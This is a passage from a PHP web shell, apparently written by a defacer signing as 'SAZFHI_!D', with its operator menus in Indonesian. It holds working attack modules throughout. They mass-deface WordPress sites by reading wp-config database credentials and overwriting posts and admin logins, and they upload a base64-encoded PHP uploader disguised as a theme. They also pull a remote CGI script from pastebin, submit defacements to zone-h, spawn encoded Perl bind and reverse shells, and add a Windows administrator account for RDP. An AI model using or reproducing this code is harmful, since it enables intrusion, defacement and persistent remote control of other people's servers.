  1587.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1588.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1589.                 $prefix = $dbprefix."posts";
  1590.                 $option = $dbprefix."options";
  1591.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1592.                 $db = mysql_select_db($dbname);
  1593.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1594.                 $result = mysql_fetch_array($q);
  1595.                 $id = $result[ID];
  1596.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1597.                 $result2 = mysql_fetch_array($q2);
  1598.                 $target = $result2[option_value];
  1599.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1600.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1601.                 echo "<div style='margin: 5px auto;'>";
  1602.                 if($target == '') {
  1603.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1604.                 } else {
  1605.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1606.                 }
  1607.                 if(!$update OR !$conn OR !$db) {
  1608.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1609.                 } else {
  1610.                     echo "<font color=lime>sukses di ganti.</font><br>";
  1611.                 }
  1612.                 echo "</div>";
  1613.                 mysql_close($conn);
  1614.             }
  1615.         }
  1616.     } else {
  1617.         echo "<center>
  1618.         <h1>Auto Edit Title+Content WordPress</h1>
  1619.         <form method='post'>
  1620.         DIR Config: <br>
  1621.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1622.         Set Title: <br>
  1623.         <input type='text' name='new_title' value='Hacked by SAZFHI_!D' placeholder='New Title'><br><br>
  1624.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1625.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1626.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1627.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1628.         </form>
  1629.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1630.         ";
  1631.     }
  1632. } elseif($_GET['do'] == 'zoneh') {
  1633.     if($_POST['submit']) {
  1634.         $domain = explode("\r\n", $_POST['url']);
  1635.         $nick =  $_POST['nick'];
  1636.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1637.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1638.         function zoneh($url,$nick) {
  1639.             $ch = curl_init("http://www.zone-h.com/notify/single");
  1640.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1641.                   curl_setopt($ch, CURLOPT_POST, true);
  1642.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1643.             return curl_exec($ch);
  1644.                   curl_close($ch);
  1645.         }
  1646.         foreach($domain as $url) {
  1647.             $zoneh = zoneh($url,$nick);
  1648.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1649.                 echo "$url -> <font color=lime>OK</font><br>";
  1650.             } else {
  1651.                 echo "$url -> <font color=red>ERROR</font><br>";
  1652.             }
  1653.         }
  1654.     } else {
  1655.         echo "<center><form method='post'>
  1656.         <u>Defacer</u>: <br>
  1657.         <input type='text' name='nick' size='50' value='SAZFHI_!D'><br>
  1658.         <u>Domains</u>: <br>
  1659.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1660.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1661.         </form>";
  1662.     }
  1663.     echo "</center>";
  1664. } elseif($_GET['do'] == 'cgi') {
  1665.     $cgi_dir = mkdir('idx_cgi', 0755);
  1666.     $file_cgi = "idx_cgi/cgi.izo";
  1667.     $isi_htcgi = "AddHandler cgi-script .izo";
  1668.     $htcgi = fopen(".htaccess", "w");
  1669.     fwrite($htcgi, $isi_htcgi);
  1670.     fclose($htcgi);
  1671.     $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  1672.     $cgi = fopen($file_cgi, "w");
  1673.     fwrite($cgi, $cgi_script);
  1674.     fclose($cgi);
  1675.     chmod($file_cgi, 0755);
  1676.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1677. } elseif($_GET['do'] == 'fake_root') {
  1678.     ob_start();
  1679.     $cwd = getcwd();
  1680.     $ambil_user = explode("/", $cwd);
  1681.     $user = $ambil_user[2];
  1682.     if($_POST['reverse']) {
  1683.         $site = explode("\r\n", $_POST['url']);
  1684.         $file = $_POST['file'];
  1685.         foreach($site as $url) {
  1686.             $cek = getsource("$url/~$user/$file");
  1687.             if(preg_match("/hacked/i", $cek)) {
  1688.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1689.             }
  1690.         }
  1691.     } else {
  1692.         echo "<center><form method='post'>
  1693.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1694.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1695.         Domain: <br>
  1696.         <textarea style='width: 450px; height: 250px;' name='url'>";
  1697.         reverse($_SERVER['HTTP_HOST']);
  1698.         echo "</textarea><br>
  1699.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1700.         </form><br>
  1701.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1702.     }
  1703. } elseif($_GET['do'] == 'adminer') {
  1704.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1705.     function adminer($url, $isi) {
  1706.         $fp = fopen($isi, "w");
  1707.         $ch = curl_init();
  1708.               curl_setopt($ch, CURLOPT_URL, $url);
  1709.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1710.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1711.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1712.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1713.         return curl_exec($ch);
  1714.               curl_close($ch);
  1715.         fclose($fp);
  1716.         ob_flush();
  1717.         flush();
  1718.     }
  1719.     if(file_exists('adminer.php')) {
  1720.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1721.     } else {
  1722.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1723.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1724.         } else {
  1725.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  1726.         }
  1727.     }
  1728. } elseif($_GET['do'] == 'auto_dwp') {
  1729.     if($_POST['auto_deface_wp']) {
  1730.         function anucurl($sites) {
  1731.             $ch = curl_init($sites);
  1732.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1733.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1734.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1735.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1736.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1737.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1738.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1739.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1740.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1741.             $data = curl_exec($ch);
  1742.                   curl_close($ch);
  1743.             return $data;
  1744.         }
  1745.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1746.             $post = array(
  1747.                    "log" => "$userr",
  1748.                    "pwd" => "$pass",
  1749.                    "rememberme" => "forever",
  1750.                    "wp-submit" => "$wp_submit",
  1751.                    "redirect_to" => "$web",
  1752.                    "testcookie" => "1",
  1753.                    );
  1754.             $ch = curl_init($cek);
  1755.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1756.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1757.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1758.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1759.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1760.                   curl_setopt($ch, CURLOPT_POST, 1);
  1761.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1762.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1763.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1764.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1765.             $data = curl_exec($ch);
  1766.                   curl_close($ch);
  1767.             return $data;
  1768.         }
  1769.         $scan = $_POST['link_config'];
  1770.         $link_config = scandir($scan);
  1771.         $script = htmlspecialchars($_POST['script']);
  1772.         $user = "SAZFHI_!D";
  1773.         $pass = "SAZFHI_!D";
  1774.         $passx = md5($pass);
  1775.         foreach($link_config as $dir_config) {
  1776.             if(!is_file("$scan/$dir_config")) continue;
  1777.             $config = file_get_contents("$scan/$dir_config");
  1778.             if(preg_match("/WordPress/", $config)) {
  1779.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1780.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1781.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1782.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1783.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1784.                 $prefix = $dbprefix."users";
  1785.                 $option = $dbprefix."options";
  1786.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1787.                 $db = mysql_select_db($dbname);
  1788.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1789.                 $result = mysql_fetch_array($q);
  1790.                 $id = $result[ID];
  1791.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1792.                 $result2 = mysql_fetch_array($q2);
  1793.                 $target = $result2[option_value];
  1794.                 if($target == '') {                
  1795.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1796.                 } else {
  1797.                     echo "[+] $target <br>";
  1798.                 }
  1799.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1800.                 if(!$conn OR !$db OR !$update) {
  1801.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1802.                     mysql_close($conn);
  1803.                 } else {
  1804.                     $site = "$target/wp-login.php";
  1805.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  1806.                     $b1 = anucurl($site2);
  1807.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1808.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1809.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1810.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1811.                     $www = "m.php";
  1812.                     $fp5 = fopen($www,"w");
  1813.                     fputs($fp5,$upload3);
  1814.                     $post2 = array(
  1815.                             "_wpnonce" => "$anu2",
  1816.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1817.                             "themezip" => "@$www",
  1818.                             "install-theme-submit" => "Install Now",
  1819.                             );
  1820.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1821.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1822.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1823.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1824.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1825.                           curl_setopt($ch, CURLOPT_POST, 1);
  1826.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1827.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1828.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1829.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1830.                     $data3 = curl_exec($ch);
  1831.                           curl_close($ch);
  1832.                     $y = date("Y");
  1833.                     $m = date("m");
  1834.                     $namafile = "id.php";
  1835.                     $fpi = fopen($namafile,"w");
  1836.                     fputs($fpi,$script);
  1837.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1838.                            curl_setopt($ch6, CURLOPT_POST, true);
  1839.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1840.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1841.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1842.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1843.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1844.                     $postResult = curl_exec($ch6);
  1845.                            curl_close($ch6);
  1846.                     $as = "$target/k.php";
  1847.                     $bs = anucurl($as);
  1848.                     if(preg_match("#$script#is", $bs)) {
  1849.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1850.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1851.                         } else {
  1852.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  1853.                         echo "[!!] coba aja manual: <br>";
  1854.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1855.                         echo "[+] username: <font color=lime>$user</font><br>";
  1856.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  1857.                         }
  1858.                     mysql_close($conn);
  1859.                 }
  1860.             }
  1861.         }
  1862.     } else {
  1863.         echo "<center><h1>WordPress Auto Deface</h1>
  1864.         <form method='post'>
  1865.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1866.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by SAZFHI_!D' required><br>
  1867.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1868.         </form>
  1869.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1870.         </center>";
  1871.     }
  1872. } elseif($_GET['do'] == 'auto_dwp2') {
  1873.     if($_POST['auto_deface_wp']) {
  1874.         function anucurl($sites) {
  1875.             $ch = curl_init($sites);
  1876.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1877.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1878.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1879.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1880.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1881.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1882.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1883.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1884.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1885.             $data = curl_exec($ch);
  1886.                   curl_close($ch);
  1887.             return $data;
  1888.         }
  1889.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1890.             $post = array(
  1891.                    "log" => "$userr",
  1892.                    "pwd" => "$pass",
  1893.                    "rememberme" => "forever",
  1894.                    "wp-submit" => "$wp_submit",
  1895.                    "redirect_to" => "$web",
  1896.                    "testcookie" => "1",
  1897.                    );
  1898.             $ch = curl_init($cek);
  1899.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1900.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1901.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1902.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1903.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1904.                   curl_setopt($ch, CURLOPT_POST, 1);
  1905.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1906.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1907.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1908.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1909.             $data = curl_exec($ch);
  1910.                   curl_close($ch);
  1911.             return $data;
  1912.         }
  1913.         $link = explode("\r\n", $_POST['link']);
  1914.         $script = htmlspecialchars($_POST['script']);
  1915.         $user = "SAZFHI_!D";
  1916.         $pass = "SAZFHI_!D";
  1917.         $passx = md5($pass);
  1918.         foreach($link as $dir_config) {
  1919.             $config = anucurl($dir_config);
  1920.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  1921.             $dbuser = ambilkata($config,"DB_USER', '","'");
  1922.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1923.             $dbname = ambilkata($config,"DB_NAME', '","'");
  1924.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1925.             $prefix = $dbprefix."users";
  1926.             $option = $dbprefix."options";
  1927.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1928.             $db = mysql_select_db($dbname);
  1929.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1930.             $result = mysql_fetch_array($q);
  1931.             $id = $result[ID];
  1932.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1933.             $result2 = mysql_fetch_array($q2);
  1934.             $target = $result2[option_value];
  1935.             if($target == '') {                
  1936.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1937.             } else {
  1938.                 echo "[+] $target <br>";
  1939.             }
  1940.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1941.             if(!$conn OR !$db OR !$update) {
  1942.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1943.                 mysql_close($conn);
  1944.             } else {
  1945.                 $site = "$target/wp-login.php";
  1946.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  1947.                 $b1 = anucurl($site2);
  1948.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1949.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1950.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1951.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1952.                 $www = "m.php";
  1953.                 $fp5 = fopen($www,"w");
  1954.                 fputs($fp5,$upload3);
  1955.                 $post2 = array(
  1956.                         "_wpnonce" => "$anu2",
  1957.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1958.                         "themezip" => "@$www",
  1959.                         "install-theme-submit" => "Install Now",
  1960.                         );
  1961.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1962.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1963.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1964.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1965.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1966.                       curl_setopt($ch, CURLOPT_POST, 1);
  1967.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1968.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1969.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1970.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1971.                 $data3 = curl_exec($ch);
  1972.                       curl_close($ch);
  1973.                 $y = date("Y");
  1974.                 $m = date("m");
  1975.                 $namafile = "id.php";
  1976.                 $fpi = fopen($namafile,"w");
  1977.                 fputs($fpi,$script);
  1978.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1979.                        curl_setopt($ch6, CURLOPT_POST, true);
  1980.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1981.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1982.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1983.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1984.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  1985.                 $postResult = curl_exec($ch6);
  1986.                        curl_close($ch6);
  1987.                 $as = "$target/k.php";
  1988.                 $bs = anucurl($as);
  1989.                 if(preg_match("#$script#is", $bs)) {
  1990.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1991.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1992.                     } else {
  1993.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
  1994.                     echo "[!!] coba aja manual: <br>";
  1995.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1996.                     echo "[+] username: <font color=lime>$user</font><br>";
  1997.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  1998.                     }
  1999.                 mysql_close($conn);
  2000.             }
  2001.         }
  2002.     } else {
  2003.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  2004.         <form method='post'>
  2005.         Link Config: <br>
  2006.         <textarea name='link' placeholder='http://target.com/sazfhi_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  2007.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by SAZFHI_!D' required><br>
  2008.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2009.         </form></center>";
  2010.     }
  2011. } elseif($_GET['do'] == 'network') {
  2012.     echo "<form method='post'>
  2013.     <u>Bind Port:</u> <br>
  2014.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2015.     <input type='submit' name='sub_bp' value='>>'>
  2016.     </form>
  2017.     <form method='post'>
  2018.     <u>Back Connect:</u> <br>
  2019.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2020.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2021.     <input type='submit' name='sub_bc' value='>>'>
  2022.     </form>";
  2023.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2024.     if(isset($_POST['sub_bp'])) {
  2025.         $f_bp = fopen("/tmp/bp.pl", "w");
  2026.         fwrite($f_bp, base64_decode($bind_port_p));
  2027.         fclose($f_bp);
  2028.  
  2029.         $port = $_POST['port_bind'];
  2030.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2031.         sleep(1);
  2032.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2033.         unlink("/tmp/bp.pl");
  2034.     }
  2035.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2036.     if(isset($_POST['sub_bc'])) {
  2037.         $f_bc = fopen("/tmp/bc.pl", "w");
  2038.         fwrite($f_bc, base64_decode($bind_connect_p));
  2039.         fclose($f_bc);
  2040.  
  2041.         $ipbc = $_POST['ip_bc'];
  2042.         $port = $_POST['port_bc'];
  2043.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2044.         sleep(1);
  2045.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2046.         unlink("/tmp/bc.pl");
  2047.     }
  2048. } elseif($_GET['do'] == 'krdp_shell') {
  2049.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  2050.         if($_POST['create']) {
  2051.             $user = htmlspecialchars($_POST['user']);
  2052.             $pass = htmlspecialchars($_POST['pass']);
  2053.             if(preg_match("/$user/", exe("net user"))) {
  2054.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  2055.             } else {
  2056.                 $add_user   = exe("net user $user $pass /add");
  2057.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  2058.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  2059.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  2060.                 echo "[ RDP ACCOUNT INFO ]<br>
  2061.                 ------------------------------<br>
  2062.                 IP: <font color=lime>".$ip."</font><br>
  2063.                 Username: <font color=lime>$user</font><br>
  2064.                 Password: <font color=lime>$pass</font><br>
  2065.                 ------------------------------<br><br>
  2066.                 [ STATUS ]<br>
  2067.                 ------------------------------<br>
  2068.                 ";
  2069.                 if($add_user) {
  2070.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  2071.                 } else {
  2072.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  2073.                 }
  2074.                 if($add_groups1) {
  2075.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  2076.                 } elseif($add_groups2) {
  2077.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  2078.                 } elseif($add_groups3) {
  2079.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  2080.                 } else {
  2081.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
